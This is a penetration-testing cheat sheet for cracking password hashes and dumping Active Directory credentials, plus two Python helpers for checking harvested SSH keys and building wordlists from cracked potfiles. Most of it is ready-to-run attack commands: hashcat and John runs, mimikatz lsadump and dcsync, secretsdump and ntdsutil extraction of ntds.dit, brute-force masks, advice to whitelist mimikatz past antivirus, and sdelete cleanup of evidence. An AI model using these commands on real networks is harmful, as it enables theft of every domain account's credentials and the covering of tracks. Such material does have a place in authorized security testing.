Password cracking
Hash identifier
hash-identifier
Online cracking (CTF only)
https://hashkiller.co.uk/
https://crackstation.net/
https://www.onlinehashcrack.com/
http://cracker.offensive-security.com/
https://md5decrypt.net/en/
https://www.cmd5.org/
https://crack.sh/
https://gpuhash.me/
https://hash.help/
https://passwordrecovery.io/
CEWL
cewl <domain> -m 6 -w <out>
JtR
john --format=md5crypt unshadowed
auxiliary/analyze/jtr_crack_fast
kerberoasting
john --format=krb5tgs <krb.txt> --wordlist=/usr/share/wordlists/rockyou.txt
Hashcat and Hashes
Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
Hashcat MD5 $1$ shadow file
hashcat -m 500 -a 0 hash.txt rockyou.txt --username
Hashcat Apache $apr1$ MD5 (htpasswd file, e.g. WebDAV auth)
hashcat -m 1600 -a 0 hash.txt rockyou.txt
Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt
Hashcat Wordpress
hashcat -m 400 -a 0 hash.txt rockyou.txt
Hashcat Kerberoasting
hashcat -m 13100 -a 0 hash.txt rockyou.txt
Crack SSH private key
Proc-Type: 4,ENCRYPTED   (header line of a passphrase-protected legacy PEM key; new-format OPENSSH keys carry no such header but can still be encrypted)
/opt/ssh2john.py id_rsa > id_john
john id_john --wordlist=/usr/share/wordlists/rockyou.txt
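Added check (not part of this cheat sheet): decide whether a private key actually needs cracking before feeding it to ssh2john. Legacy PEM keys announce encryption with the Proc-Type / DEK-Info headers; new-format keys (BEGIN OPENSSH PRIVATE KEY) put the cipher and KDF name inside the base64 blob, so both layouts are inspected. The sample keys below are constructed (no real key material) and the builder function is a test helper, not an OpenSSH tool.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"  # first bytes of the blob in new-format keys


def _read_string(blob: bytes, off: int):
    """Read one SSH wire-format string: uint32 big-endian length, then that many bytes."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def key_encryption(key_text: str) -> dict:
    """Return the container format, whether a passphrase is required, and cipher/KDF."""
    lines = [l.strip() for l in key_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)  # b"none" or e.g. b"aes256-ctr"
        kdf, off = _read_string(blob, off)     # b"none" or b"bcrypt"
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode()}
    # Legacy PEM (ssh-keygen -m PEM): encryption is announced in the text headers.
    # PKCS#8 keys say "BEGIN ENCRYPTED PRIVATE KEY" instead, so the BEGIN line is checked too.
    headers = dict(l.split(": ", 1) for l in lines[1:-1] if ": " in l)
    encrypted = headers.get("Proc-Type") == "4,ENCRYPTED" or "ENCRYPTED" in lines[0]
    dek = headers.get("DEK-Info", "")
    cipher = dek.split(",")[0] if dek else ("unknown (PKCS#8)" if encrypted else "none")
    return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "EVP_BytesToKey(MD5)" if dek else "none"}


def build_openssh_key(cipher: bytes, kdf: bytes) -> str:
    """Test helper: build a minimal openssh-key-v1 container (constructed, no real key).
    kdfoptions and the key sections are left empty; only the header fields matter here."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    blob = (OPENSSH_MAGIC + s(cipher) + s(kdf) + s(b"")
            + struct.pack(">I", 1) + s(b"") + s(b""))
    body = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy PEM sample: headers are real-looking, the body is filler.
SAMPLE_PEM_ENC = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0g=
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, key in [("legacy pem", SAMPLE_PEM_ENC),
                      ("openssh encrypted", build_openssh_key(b"aes256-ctr", b"bcrypt")),
                      ("openssh plain", build_openssh_key(b"none", b"none"))]:
        print(name, key_encryption(key))
```

Run it on a harvested id_rsa (`key_encryption(open("id_rsa").read())`); if `encrypted` is False the key can be used directly and no cracking is needed.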
Dump NTLM passwords
use windows/gather/credentials/domain_hashdump
Alternative methods
use auxiliary/admin/smb/psexec_ntdsgrab
Hashdump / smarthashdump (unsafe for big AD)
Mimikatz Module:
lsadump::lsa /inject [/name:krbtgt] (unsafe)
Impacket
impacket-secretsdump <fqdn_domain>/<da_account>:'<password>'@<DC_ip> -just-dc
Ntdsutil IFM (the dump contains ntds.dit plus the SYSTEM and SECURITY hives under C:\ntdsutil\registry; SYSTEM is needed to decrypt it)
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
Dump
./adXtract.sh /root/ntds.dit /root/SYSTEM <projectname>
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
Parsing
From Cobalt Strike export
grep ":::" credentials.txt | grep -i <fqdn_domain> | cut -d '\' -f2 | cut -d ':' -f1,4 > <fqdn_domain>.hashes
From impacket-secretdump
grep '.*:.*:.*:.*:::' <impacket.hashes> | cut -d ':' -f1,4 | grep -v '\$' > <domain.hashes>
From MSF
db_export -f pwdump <mission.pwdump>
grep '.*:.*:.*:.*:::' mission.pwdump > mission.hashes
From ntds.dit + SYSTEM
secretsdump.py -ntds <ntds.dit> -system <SYSTEM> LOCAL | grep '.*:.*:.*:.*:::' | cut -d ":" -f 1,4 > /tmp/ntds.hash
git clone https://github.com/HarmJ0y/ImpDump /opt/Impdump
cd /opt/Impdump
chmod +x setup.sh
./setup.sh
/opt/Impdump/extract.sh <NTDS.dit> > /tmp/ntds.raw
/opt/Impdump/impdump.py <SYSTEM> /tmp/ntds.raw | cut -d ":" -f 1,4 > /tmp/ntds.hash
DCSync extraction method
Prerequisites
- A domain account holding the Replicating Directory Changes and Replicating Directory Changes All permissions. By default only members of Domain Admins, Enterprise Admins, Administrators and Domain Controllers have them.
- A session with this account on any domain-joined system (server or workstation); being on the domain controller itself is not required.
- Access to PowerShell on the system
- Download the latest mimikatz release
- Extract the archive and whitelist the binaries in the antivirus / AppLocker policy if necessary.
- Download Secure Delete (sdelete) from Sysinternals for the cleanup step
Extraction
Check the system architecture and pick the matching mimikatz build (32- or 64-bit): run the following command and read the "System Type" line
C:\>systeminfo | findstr "System"
System Boot Time: 01-01-1970, 00:00:00
System Manufacturer: Some manufacturer
System Model: Some model
System Type: x64-based PC
System Directory: C:\WINDOWS\system32
System Locale: fr-be;French (Belgium)
In the mimikatz prompt type the following commands (one by one)
log C:\mimikatz.log
lsadump::dcsync /all /csv
exit
Open the mimikatz log file and remove every line that is not dcsync output
Each remaining line should have the format: userID username ntlmhash
Save and close the log file
Parsing
Convert the log to hashcat syntax (user:hash) and store it in C:\ntlm.hash (ASCII encoding: Windows PowerShell's Out-File defaults to UTF-16, which hashcat will not parse)
Get-Content C:\mimikatz.log | ForEach-Object { $_ -replace "\s+",":" } | ForEach-Object { $_.split(":")[1..2] -join ":" } | Out-File -Encoding ascii C:\ntlm.hash
Cleanup
Once C:\ntlm.hash has been copied off the host, wipe C:\mimikatz.log and C:\ntlm.hash with sdelete.
Password cracking NTLM (domain)
With a CrackStation
TO DO
Without a CrackStation
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\d3*
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\realuniq.lst -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\small\* -r rules\*
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?a?a?a?a?a?a -i
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out -1 ?l?d -2 ?d?s ?u?l?l?l?l?1?1?2?2
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?d?d?d?d?d?d?d?d?d?d?d?d -i
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\efensive.rule
Common masks
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?l?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?s
Custom dictionary
1) Reuse cracked passwords
2) Establish patterns to perform mask attacks
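Added example (not the page's own tooling) for both custom-dictionary steps: join the `user:nthash` file with hashcat's potfile (`hash:plain`, with `$HEX[...]` for plains containing a colon or non-printables) to get cleartexts per user, turn the cracked plains and their base words into a wordlist for the next run, and derive hashcat masks from them, most common first, for `-a 3`. The user list and potfile below are constructed; `8846f7...` is the NT hash of "password", the other hashes are filler.

```python
import re
from collections import Counter


def load_user_hashes(text):
    """user:nthash lines (hashcat --username layout) -> [(user, nthash)]."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if ":" in line:
            user, nt = line.rsplit(":", 1)
            pairs.append((user, nt.lower()))
    return pairs


def load_potfile(text):
    """hashcat.potfile lines are hash:plain; hashcat writes $HEX[..] when the plain
    contains ':' or bytes outside printable ASCII, so those are decoded here."""
    pot = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        nt, plain = line.strip().split(":", 1)
        if plain.startswith("$HEX[") and plain.endswith("]"):
            raw = bytes.fromhex(plain[5:-1])
            try:
                plain = raw.decode("utf-8")
            except UnicodeDecodeError:
                plain = raw.decode("latin-1")
        pot[nt.lower()] = plain
    return pot


def cracked_users(pairs, pot):
    """{user: cleartext} for every account whose NT hash is in the potfile."""
    return {user: pot[nt] for user, nt in pairs if nt in pot}


def mask_of(plain):
    """hashcat mask of one password: ?u ?l ?d ?s, ?b for non-ASCII bytes."""
    out = []
    for c in plain:
        if c.islower():
            out.append("?l")
        elif c.isupper():
            out.append("?u")
        elif c.isdigit():
            out.append("?d")
        elif c.isascii():
            out.append("?s")
        else:
            out.append("?b")
    return "".join(out)


def top_masks(plains, n=5):
    """Most frequent masks among cracked plains, for the next -a 3 run."""
    return Counter(mask_of(p) for p in plains).most_common(n)


def reuse_wordlist(plains):
    """Unique cracked plains plus their base word (trailing digits/symbols stripped),
    in first-seen order, for the next -a 0 run with rules."""
    words, seen = [], set()
    for p in plains:
        base = re.sub(r"[^A-Za-z]+$", "", p)  # "Summer2019!" -> "Summer"
        for w in (p, base):
            if w and w not in seen:
                seen.add(w)
                words.append(w)
    return words


# Constructed inputs: normalized user list and a matching hashcat potfile.
USER_HASHES = """Administrator:8846f7eaee8fb117ad06bdd830b7586c
jdoe:8846f7eaee8fb117ad06bdd830b7586c
asmith:a1b2c3d4e5f60718293a4b5c6d7e8f90
krbtgt:e19ccf75ee54e06b06a5907af13cef42
bwayne:0123456789abcdef0123456789abcdef
"""
POTFILE = """8846f7eaee8fb117ad06bdd830b7586c:password
a1b2c3d4e5f60718293a4b5c6d7e8f90:Summer2019!
0123456789abcdef0123456789abcdef:$HEX[57696e3a74657232303230]
"""

if __name__ == "__main__":
    cracked = cracked_users(load_user_hashes(USER_HASHES), load_potfile(POTFILE))
    for user, plain in cracked.items():
        print(f"{user}: {plain}")
    print("wordlist:", reuse_wordlist(list(cracked.values())))
    print("masks:", top_masks(list(cracked.values())))
```

For rule-based runs hashcat's own `--loopback` already re-feeds new plains automatically; this script is for building the standalone wordlist and mask list across runs and potfiles, and for reporting which users fell.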